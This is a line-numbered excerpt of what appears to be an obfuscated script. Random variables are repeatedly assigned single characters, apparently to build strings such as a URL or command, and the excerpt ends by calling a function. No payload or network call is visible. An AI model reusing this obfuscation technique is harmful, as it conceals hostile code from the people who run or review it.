749 | wcljg = "G"; | |
750 | wcljg = "c"; | |
751 | wcljg = "D"; | |
752 | wcljg = "e"; | |
753 | wcljg = "b"; | |
754 | nfesufn = "z"; | |
755 | nfesufn = "f"; | |
756 | nfesufn = "V"; | |
757 | nfesufn = "S"; | |
758 | nfesufn = "k"; | |
759 | nfesufn = "B"; | |
760 | nfesufn = "c"; | |
761 | nfesufn = "c"; | |
762 | nfesufn = "D"; | |
763 | nfesufn = "E"; | |
764 | nfesufn = "u"; | |
765 | nfesufn = "O"; | |
766 | nfesufn = "N"; | |
767 | nfesufn = "D"; | |
768 | nfesufn = "f"; | |
769 | qlbhf = "a"; | |
770 | qlbhf = "S"; | |
771 | qlbhf = "s"; | |
772 | qlbhf = "G"; | |
773 | qlbhf = "z"; | |
774 | qlbhf = "t"; | |
775 | qlbhf = "Y"; | |
776 | qlbhf = "A"; | |
777 | qlbhf = "V"; | |
778 | qlbhf = "t"; | |
779 | qlbhf = "H"; | |
780 | qlbhf = "H"; | |
781 | izphvncsu = "S"; | |
782 | izphvncsu = "V"; | |
783 | izphvncsu = "K"; | |
784 | izphvncsu = "U"; | |
785 | izphvncsu = "p"; | |
786 | izphvncsu = "x"; | |
787 | izphvncsu = "c"; | |
788 | izphvncsu = "q"; | |
789 | izphvncsu = "R"; | |
790 | izphvncsu = "L"; | |
791 | izphvncsu = "x"; | |
792 | izphvncsu = "f"; | |
793 | izphvncsu = "c"; | |
794 | izphvncsu = "N"; | |
795 | izphvncsu = "I"; | |
796 | izphvncsu = "y"; | |
797 | izphvncsu = "g"; | |
798 | izphvncsu = "M"; | |
799 | izphvncsu = "Q"; | |
800 | izphvncsu = "P"; | |
801 | izphvncsu = "G"; | |
802 | izphvncsu = "V"; | |
803 | izphvncsu = "W"; | |
804 | izphvncsu = "%"; | |
805 | kchbvi = "p"; | |
806 | kchbvi = "u"; | |
807 | kchbvi = "Y"; | |
808 | kchbvi = "w"; | |
809 | kchbvi = "V"; | |
810 | kchbvi = "c"; | |
811 | kchbvi = "t"; | |
812 | kchbvi = "c"; | |
813 | kchbvi = "U"; | |
814 | kchbvi = "P"; | |
815 | kchbvi = "U"; | |
816 | kchbvi = "p"; | |
817 | kchbvi = "W"; | |
818 | kchbvi = "d"; | |
819 | kchbvi = "Q"; | |
820 | kchbvi = "D"; | |
821 | kchbvi = "z"; | |
822 | kchbvi = "o"; | |
823 | kchbvi = "i"; | |
824 | kchbvi = "i"; | |
825 | kchbvi = "U"; | |
826 | kchbvi = "T"; | |
827 | kchbvi = "q"; | |
828 | kchbvi = "Y"; | |
829 | kchbvi = "K"; | |
830 | kchbvi = "l"; | |
831 | kchbvi = "M"; | |
832 | kchbvi = "x"; | |
833 | kchbvi = "k"; | |
834 | kchbvi = "c"; | |
835 | kchbvi = "b"; | |
836 | kchbvi = "k"; | |
837 | sdhagcg = "d"; | |
838 | sdhagcg = "e"; | |
839 | sdhagcg = "E"; | |
840 | sdhagcg = "o"; | |
841 | sdhagcg = "N"; | |
842 | sdhagcg = "d"; | |
843 | sdhagcg = "z"; | |
844 | sdhagcg = "E"; | |
845 | sdhagcg = "F"; | |
846 | sdhagcg = "l"; | |
847 | sdhagcg = "a"; | |
848 | sdhagcg = "c"; | |
849 | sdhagcg = "S"; | |
850 | sdhagcg = "u"; | |
851 | sdhagcg = "f"; | |
852 | sdhagcg = "t"; | |
853 | sdhagcg = "c"; | |
854 | sdhagcg = "n"; | |
855 | sdhagcg = "U"; | |
856 | sdhagcg = "g"; | |
857 | sdhagcg = "O"; | |
858 | sdhagcg = "o"; | |
859 | sdhagcg = "I"; | |
860 | sdhagcg = "j"; | |
861 | sdhagcg = "F"; | |
862 | sdhagcg = "d"; | |
863 | sdhagcg = "m"; | |
864 | sdhagcg = "l"; | |
865 | sdhagcg = "Q"; | |
866 | sdhagcg = "p"; | |
867 | sdhagcg = "o"; | |
868 | sdhagcg = ":"; | |
869 | eeovldkct = "Q"; | |
870 | eeovldkct = "P"; | |
871 | yztlfs = "D"; | |
872 | yztlfs = "w"; | |
873 | yztlfs = "o"; | |
874 | yztlfs = "j"; | |
875 | yztlfs = "a"; | |
876 | yztlfs = "Q"; | |
877 | yztlfs = "g"; | |
878 | yztlfs = "A"; | |
879 | yztlfs = "M"; | |
880 | yztlfs = "K"; | |
881 | yztlfs = "T"; | |
882 | yztlfs = "d"; | |
883 | yztlfs = "C"; | |
884 | yztlfs = "J"; | |
885 | yztlfs = "K"; | |
886 | yztlfs = "Q"; | |
887 | yztlfs = "r"; | |
888 | yztlfs = "g"; | |
889 | yztlfs = "q"; | |
890 | yztlfs = "T"; | |
891 | yztlfs = "p"; | |
892 | yztlfs = "d"; | |
893 | yztlfs = "V"; | |
894 | yztlfs = "y"; | |
895 | yztlfs = "V"; | |
896 | yztlfs = "T"; | |
897 | yztlfs = "h"; | |
898 | yztlfs = "f"; | |
899 | yztlfs = "Q"; | |
900 | yztlfs = "X"; | |
901 | yztlfs = "E"; | |
902 | yztlfs = "T"; | |
903 | yztlfs = "c"; | |
904 | azbou = "q"; | |
905 | azbou = "b"; | |
906 | azbou = "j"; | |
907 | azbou = "k"; | |
908 | azbou = "v"; | |
909 | azbou = "U"; | |
910 | azbou = "l"; | |
911 | azbou = "R"; | |
912 | azbou = "J"; | |
913 | azbou = "o"; | |
914 | azbou = "s"; | |
915 | azbou = "V"; | |
916 | azbou = "P"; | |
917 | azbou = "r"; | |
918 | azbou = "I"; | |
919 | azbou = "k"; | |
920 | azbou = "W"; | |
921 | azbou = "V"; | |
922 | azbou = "z"; | |
923 | azbou = "L"; | |
924 | azbou = "S"; | |
925 | azbou = "d"; | |
926 | vbflahvdc = "n"; | |
927 | vbflahvdc = "Q"; | |
928 | vbflahvdc = "j"; | |
929 | vbflahvdc = "h"; | |
930 | vbflahvdc = "D"; | |
931 | vbflahvdc = "b"; | |
932 | vbflahvdc = "D"; | |
933 | vbflahvdc = "X"; | |
934 | vbflahvdc = "J"; | |
935 | vbflahvdc = "s"; | |
936 | vbflahvdc = "F"; | |
937 | vbflahvdc = "U"; | |
938 | vbflahvdc = "m"; | |
939 | vbflahvdc = "Z"; | |
940 | vbflahvdc = "w"; | |
941 | vbflahvdc = "X"; | |
942 | vbflahvdc = "a"; | |
943 | vbflahvdc = "z"; | |
944 | vbflahvdc = "b"; | |
945 | vbflahvdc = "V"; | |
946 | vbflahvdc = "m"; | |
947 | vbflahvdc = "v"; | |
948 | vbflahvdc = "g"; | |
949 | vbflahvdc = "C"; | |
950 | vbflahvdc = "S"; | |
951 | vbflahvdc = "l"; | |
952 | vbflahvdc = "j"; | |
953 | vbflahvdc = "O"; | |
954 | vbflahvdc = "b"; | |
955 | vbflahvdc = "h"; | |
956 | vbflahvdc = "M"; | |
957 | vbflahvdc = "o"; | |
958 | vbflahvdc = "B"; | |
959 | vbflahvdc = "p"; | |
960 | vbflahvdc = "F"; | |
961 | vbflahvdc = "Q"; | |
962 | nyzve = "k"; | |
963 | nyzve = "s"; | |
964 | nyzve = "M"; | |
965 | nyzve = "r"; | |
966 | nyzve = "k"; | |
967 | nyzve = "C"; | |
968 | nyzve = "u"; | |
969 | nyzve = "C"; | |
970 | nyzve = "b"; | |
971 | nyzve = "G"; | |
972 | nyzve = "q"; | |
973 | nyzve = "U"; | |
974 | nyzve = "k"; | |
975 | nyzve = "Y"; | |
976 | nyzve = "y"; | |
977 | nyzve = "T"; | |
978 | nyzve = "f"; | |
979 | nyzve = "i"; | |
980 | nyzve = "E"; | |
981 | nyzve = "v"; | |
982 | nyzve = "t"; | |
983 | nyzve = "s"; | |
984 | nyzve = "B"; | |
985 | nyzve = "x"; | |
986 | nyzve = "D"; | |
987 | nyzve = "Q"; | |
988 | nyzve = "v"; | |
989 | nyzve = "C"; | |
990 | nyzve = "s"; | |
991 | nyzve = "G"; | |
992 | nyzve = "L"; | |
993 | nyzve = "Z"; | |
994 | nyzve = "Y"; | |
995 | nyzve = "/"; | |
996 | ftrzooc = "R"; | |
997 | ftrzooc = "U"; | |
998 | ftrzooc = "h"; | |
999 | ftrzooc = "w"; | |
1000 | ftrzooc = "M"; | |
1001 | ftrzooc = "C"; | |
1002 | qhizqjut = "g"; | |
1003 | qhizqjut = "U"; | |
1004 | qhizqjut = "V"; | |
1005 | qhizqjut = "c"; | |
1006 | qhizqjut = "M"; | |
1007 | qhizqjut = "5"; | |
1008 | umfoebpjq = "M"; | |
1009 | umfoebpjq = "U"; | |
1010 | umfoebpjq = "Q"; | |
1011 | umfoebpjq = "x"; | |
1012 | umfoebpjq = "t"; | |
1013 | umfoebpjq = "b"; | |
1014 | umfoebpjq = "z"; | |
1015 | umfoebpjq = "o"; | |
1016 | umfoebpjq = "l"; | |
1017 | umfoebpjq = "v"; | |
1018 | umfoebpjq = "D"; | |
1019 | umfoebpjq = "U"; | |
1020 | umfoebpjq = "L"; | |
1021 | umfoebpjq = "r"; | |
1022 | umfoebpjq = "L"; | |
1023 | umfoebpjq = "P"; | |
1024 | umfoebpjq = "j"; | |
1025 | okhltyvo = "O"; | |
1026 | okhltyvo = "d"; | |
1027 | okhltyvo = "j"; | |
1028 | okhltyvo = "U"; | |
1029 | dzbmi = "o"; | |
1030 | dzbmi = "P"; | |
1031 | dzbmi = "M"; | |
1032 | dzbmi = "D"; | |
1033 | dzbmi = "L"; | |
1034 | dzbmi = "t"; | |
1035 | dzbmi = "w"; | |
1036 | dzbmi = "D"; | |
1037 | dzbmi = "q"; | |
1038 | dzbmi = "P"; | |
1039 | dzbmi = " "; | |
1040 | yjmkiost = "R"; | |
1041 | yjmkiost = "s"; | |
1042 | yjmkiost = "x"; | |
1043 | yjmkiost = "Z"; | |
1044 | yjmkiost = "z"; | |
1045 | yjmkiost = "P"; | |
1046 | yjmkiost = "m"; | |
1047 | yjmkiost = "K"; | |
1048 | yjmkiost = "B"; | |
1049 | yjmkiost = "A"; | |
1050 | yjmkiost = "r"; | |
1051 | yjmkiost = "M"; | |
1052 | yjmkiost = "L"; | |
1053 | yjmkiost = "T"; | |
1054 | yjmkiost = "g"; | |
1055 | yjmkiost = "N"; | |
1056 | yjmkiost = "z"; | |
1057 | yjmkiost = "T"; | |
1058 | yjmkiost = "s"; | |
1059 | yjmkiost = "T"; | |
1060 | yjmkiost = "x"; | |
1061 | yjmkiost = "i"; | |
1062 | yjmkiost = "z"; | |
1063 | yjmkiost = "T"; | |
1064 | yjmkiost = "&"; | |
1065 | yuvyuvt = "C"; | |
1066 | yuvyuvt = "U"; | |
1067 | yuvyuvt = "w"; | |
1068 | yuvyuvt = "J"; | |
1069 | yuvyuvt = "p"; | |
1070 | yuvyuvt = "s"; | |
1071 | yuvyuvt = "C"; | |
1072 | yuvyuvt = "D"; | |
1073 | yuvyuvt = "u"; | |
1074 | yuvyuvt = "8"; | |
1075 | mlxbd = "Q"; | |
1076 | mlxbd = "k"; | |
1077 | mlxbd = "O"; | |
1078 | mlxbd = "M"; | |
1079 | mlxbd = "m"; | |
1080 | mlxbd = "f"; | |
1081 | mlxbd = "A"; | |
1082 | mlxbd = "a"; | |
1083 | mlxbd = "b"; | |
1084 | mlxbd = "e"; | |
1085 | mlxbd = "G"; | |
1086 | mlxbd = "K"; | |
1087 | mlxbd = "K"; | |
1088 | mlxbd = "S"; | |
1089 | mlxbd = "t"; | |
1090 | mlxbd = "C"; | |
1091 | mlxbd = "X"; | |
1092 | mlxbd = "h"; | |
1093 | mlxbd = "x"; | |
1094 | mlxbd = "K"; | |
1095 | mlxbd = "K"; | |
1096 | mlxbd = "m"; | |
1097 | mlxbd = "K"; | |
1098 | mlxbd = "D"; | |
1099 | mlxbd = "n"; | |
1100 | mlxbd = "W"; | |
1101 | mlxbd = "Q"; | |
1102 | mlxbd = "T"; | |
1103 | mlxbd = "o"; | |
1104 | mlxbd = "Y"; | |
1105 | mlxbd = "L"; | |
1106 | mlxbd = "C"; | |
1107 | mlxbd = "D"; | |
1108 | mlxbd = "L"; | |
1109 | zmrawx = "r"; | |
1110 | zmrawx = "R"; | |
1111 | zmrawx = "w"; | |
1112 | zmrawx = "K"; | |
1113 | zmrawx = "D"; | |
1114 | zmrawx = "v"; | |
1115 | zmrawx = "f"; | |
1116 | zmrawx = "h"; | |
1117 | zmrawx = "G"; | |
1118 | zmrawx = "H"; | |
1119 | zmrawx = "G"; | |
1120 | zmrawx = "e"; | |
1121 | zmrawx = "m"; | |
1122 | zmrawx = "G"; | |
1123 | zmrawx = "p"; | |
1124 | zmrawx = "s"; | |
1125 | zmrawx = "u"; | |
1126 | zmrawx = "q"; | |
1127 | zmrawx = "f"; | |
1128 | zmrawx = "e"; | |
1129 | zmrawx = "K"; | |
1130 | zmrawx = "U"; | |
1131 | zmrawx = "z"; | |
1132 | zmrawx = "D"; | |
1133 | zmrawx = "U"; | |
1134 | zmrawx = "D"; | |
1135 | zmrawx = "j"; | |
1136 | zmrawx = "m"; | |
1137 | zmrawx = "I"; | |
1138 | zmrawx = "O"; | |
1139 | zmrawx = "D"; | |
1140 | zmrawx = "r"; | |
1141 | zmrawx = "U"; | |
1142 | zmrawx = "W"; | |
1143 | zmrawx = "O"; | |
1144 | zmrawx = "V"; | |
1145 | zmrawx = "e"; | |
1146 | zmrawx = "q"; | |
1147 | xpndkxa = "M"; | |
1148 | xpndkxa = "Y"; | |
1149 | xpndkxa = "w"; | |
1150 | xpndkxa = "T"; | |
1151 | xpndkxa = "A"; | |
1152 | xpndkxa = "g"; | |
1153 | xpndkxa = "D"; | |
1154 | xpndkxa = "v"; | |
1155 | xpndkxa = "S"; | |
1156 | xpndkxa = "p"; | |
1157 | xpndkxa = "E"; | |
1158 | xpndkxa = "M"; | |
1159 | xpndkxa = "w"; | |
1160 | xpndkxa = "S"; | |
1161 | xpndkxa = "Z"; | |
1162 | xpndkxa = "k"; | |
1163 | xpndkxa = "Q"; | |
1164 | xpndkxa = "Z"; | |
1165 | xpndkxa = "d"; | |
1166 | xpndkxa = "p"; | |
1167 | xpndkxa = "E"; | |
1168 | xpndkxa = "E"; | |
1169 | xpndkxa = "A"; | |
1170 | xpndkxa = "z"; | |
1171 | xpndkxa = "x"; | |
1172 | xpndkxa = "K"; | |
1173 | tgzcg = "I"; | |
1174 | tgzcg = "Z"; | |
1175 | tgzcg = "r"; | |
1176 | tgzcg = "N"; | |
1177 | tgzcg = "z"; | |
1178 | tgzcg = "R"; | |
1179 | tgzcg = "d"; | |
1180 | tgzcg = "m"; | |
1181 | tgzcg = "q"; | |
1182 | tgzcg = "r"; | |
1183 | tgzcg = "d"; | |
1184 | tgzcg = "f"; | |
1185 | tgzcg = "O"; | |
1186 | tgzcg = "K"; | |
1187 | tgzcg = "S"; | |
1188 | tgzcg = "M"; | |
1189 | tgzcg = "O"; | |
1190 | tgzcg = "m"; | |
1191 | tgzcg = "o"; | |
1192 | tgzcg = "e"; | |
1193 | tgzcg = "J"; | |
1194 | tgzcg = "N"; | |
1195 | tgzcg = "r"; | |
1196 | tgzcg = "a"; | |
1197 | tgzcg = "x"; | |
1198 | tgzcg = "A"; | |
1199 | tgzcg = "Y"; | |
1200 | tmuhd = "C"; | |
1201 | tmuhd = "T"; | |
1202 | tmuhd = "I"; | |
1203 | tmuhd = "t"; | |
1204 | tmuhd = "W"; | |
1205 | tmuhd = "S"; | |
1206 | tmuhd = "k"; | |
1207 | tmuhd = "u"; | |
1208 | tmuhd = "p"; | |
1209 | fnaqpiq = "W"; | |
1210 | fnaqpiq = "j"; | |
1211 | fnaqpiq = "L"; | |
1212 | fnaqpiq = "O"; | |
1213 | fnaqpiq = "s"; | |
1214 | fnaqpiq = "N"; | |
1215 | fnaqpiq = "v"; | |
1216 | fnaqpiq = "b"; | |
1217 | fnaqpiq = "X"; | |
1218 | fnaqpiq = "h"; | |
1219 | fnaqpiq = "F"; | |
1220 | fnaqpiq = "x"; | |
1221 | fnaqpiq = "o"; | |
1222 | fnaqpiq = "W"; | |
1223 | fnaqpiq = "L"; | |
1224 | fnaqpiq = "I"; | |
1225 | fnaqpiq = "Q"; | |
1226 | fnaqpiq = "W"; | |
1227 | fnaqpiq = "v"; | |
1228 | fnaqpiq = "n"; | |
1229 | fnaqpiq = "J"; | |
1230 | fnaqpiq = "O"; | |
1231 | fnaqpiq = "e"; | |
1232 | fnaqpiq = "i"; | |
1233 | fnaqpiq = "e"; | |
1234 | fnaqpiq = "A"; | |
1235 | fnaqpiq = "R"; | |
1236 | fnaqpiq = "3"; | |
1237 | ymmkty = "k"; | |
1238 | ymmkty = "u"; | |
1239 | ymmkty = "a"; | |
1240 | ymmkty = "X"; | |
1241 | ymmkty = "m"; | |
1242 | ymmkty = "m"; | |
1243 | ymmkty = "m"; | |
1244 | ymmkty = "m"; | |
1245 | ymmkty = "P"; | |
1246 | ymmkty = "N"; | |
1247 | ymmkty = "V"; | |
1248 | ymmkty = "L"; | |
1249 | ymmkty = "z"; | |
1250 | ymmkty = "Z"; | |
1251 | ymmkty = "x"; | |
1252 | ymmkty = "C"; | |
1253 | ymmkty = "P"; | |
1254 | ymmkty = "T"; | |
1255 | jniwxrj = "c"; | |
1256 | jniwxrj = "g"; | |
1257 | jniwxrj = "z"; | |
1258 | jniwxrj = "Z"; | |
1259 | jniwxrj = "Y"; | |
1260 | jniwxrj = "t"; | |
1261 | jniwxrj = "w"; | |
1262 | jniwxrj = "l"; | |
1263 | jniwxrj = "t"; | |
1264 | jniwxrj = "y"; | |
1265 | jniwxrj = "g"; | |
1266 | jniwxrj = "V"; | |
1267 | jniwxrj = "x"; | |
1268 | jniwxrj = "s"; | |
1269 | jniwxrj = "H"; | |
1270 | jniwxrj = "e"; | |
1271 | jniwxrj = "V"; | |
1272 | jniwxrj = "v"; | |
1273 | jniwxrj = "D"; | |
1274 | jniwxrj = "t"; | |
1275 | jniwxrj = "z"; | |
1276 | jniwxrj = "X"; | |
1277 | jniwxrj = "S"; | |
1278 | jniwxrj = "r"; | |
1279 | jniwxrj = "t"; | |
1280 | jniwxrj = "T"; | |
1281 | jniwxrj = "V"; | |
1282 | jniwxrj = "e"; | |
1283 | jniwxrj = "a"; | |
1284 | jniwxrj = "z"; | |
1285 | jniwxrj = "a"; | |
1286 | jniwxrj = "A"; | |
1287 | jniwxrj = "l"; | |
1288 | jniwxrj = "W"; | |
1289 | jniwxrj = "K"; | |
1290 | jniwxrj = "D"; | |
1291 | jniwxrj = "s"; | |
1292 | jniwxrj = "w"; | |
1293 | jniwxrj = "g"; | |
1294 | jniwxrj = "R"; | |
1295 | brpiwcxb = "i"; | |
1296 | brpiwcxb = "S"; | |
1297 | brpiwcxb = "s"; | |
1298 | brpiwcxb = "I"; | |
1299 | brpiwcxb = "h"; | |
1300 | brpiwcxb = "w"; | |
1301 | brpiwcxb = "E"; | |
1302 | brpiwcxb = "d"; | |
1303 | brpiwcxb = "y"; | |
1304 | brpiwcxb = "b"; | |
1305 | brpiwcxb = "Q"; | |
1306 | brpiwcxb = "P"; | |
1307 | brpiwcxb = "F"; | |
1308 | brpiwcxb = "B"; | |
1309 | brpiwcxb = "a"; | |
1310 | brpiwcxb = "K"; | |
1311 | brpiwcxb = "f"; | |
1312 | brpiwcxb = "u"; | |
1313 | brpiwcxb = "s"; | |
1314 | brpiwcxb = "e"; | |
1315 | iixldzd = "b"; | |
1316 | iixldzd = "d"; | |
1317 | iixldzd = "d"; | |
1318 | iixldzd = "A"; | |
1319 | iixldzd = "N"; | |
1320 | iixldzd = "P"; | |
1321 | iixldzd = "z"; | |
1322 | iixldzd = "h"; | |
1323 | iixldzd = "C"; | |
1324 | iixldzd = "G"; | |
1325 | iixldzd = "t"; | |
1326 | iixldzd = "x"; | |
1327 | iixldzd = "c"; | |
1328 | iixldzd = "r"; | |
1329 | iixldzd = "F"; | |
1330 | iixldzd = "i"; | |
1331 | iixldzd = "N"; | |
1332 | iixldzd = "P"; | |
1333 | iixldzd = "A"; | |
1334 | iixldzd = "Z"; | |
1335 | iixldzd = "x"; | |
1336 | iixldzd = "I"; | |
1337 | iixldzd = "U"; | |
1338 | iixldzd = "S"; | |
1339 | iixldzd = "X"; | |
1340 | iixldzd = "d"; | |
1341 | iixldzd = "k"; | |
1342 | iixldzd = "s"; | |
1343 | iixldzd = "l"; | |
1344 | iixldzd = "w"; | |
1345 | iixldzd = "t"; | |
1346 | iixldzd = "u"; | |
1347 | iixldzd = "O"; | |
1348 | iixldzd = "w"; | |
1349 | japevka = "W"; | |
1350 | japevka = "J"; | |
1351 | japevka = "g"; | |
1352 | japevka = "q"; | |
1353 | japevka = "X"; | |
1354 | japevka = "p"; | |
1355 | japevka = "o"; | |
1356 | japevka = "W"; | |
1357 | japevka = "I"; | |
1358 | japevka = "X"; | |
1359 | japevka = "c"; | |
1360 | japevka = "i"; | |
1361 | japevka = "W"; | |
1362 | japevka = "z"; | |
1363 | japevka = "v"; | |
1364 | japevka = "B"; | |
1365 | japevka = "e"; | |
1366 | japevka = "o"; | |
1367 | japevka = "N"; | |
1368 | japevka = "t"; | |
1369 | bmrczpna = "B"; | |
1370 | bmrczpna = "t"; | |
1371 | bmrczpna = "I"; | |
1372 | bmrczpna = "e"; | |
1373 | bmrczpna = "P"; | |
1374 | bmrczpna = "J"; | |
1375 | bmrczpna = "P"; | |
1376 | bmrczpna = "l"; | |
1377 | bmrczpna = "D"; | |
1378 | bmrczpna = "M"; | |
1379 | bmrczpna = "n"; | |
1380 | bmrczpna = "c"; | |
1381 | bmrczpna = "c"; | |
1382 | bmrczpna = "w"; | |
1383 | bmrczpna = "z"; | |
1384 | bmrczpna = "M"; | |
1385 | bmrczpna = "Q"; | |
1386 | bmrczpna = "f"; | |
1387 | bmrczpna = "W"; | |
1388 | bmrczpna = "v"; | |
1389 | bmrczpna = "j"; | |
1390 | bmrczpna = "Z"; | |
1391 | bmrczpna = "S"; | |
1392 | bmrczpna = "n"; | |
1393 | bmrczpna = "D"; | |
1394 | bmrczpna = "h"; | |
1395 | bmrczpna = "w"; | |
1396 | bmrczpna = "k"; | |
1397 | bmrczpna = "C"; | |
1398 | bmrczpna = "Q"; | |
1399 | bmrczpna = "M"; | |
1400 | bmrczpna = "k"; | |
1401 | bmrczpna = "g"; | |
1402 | gwqahus ( ); |
|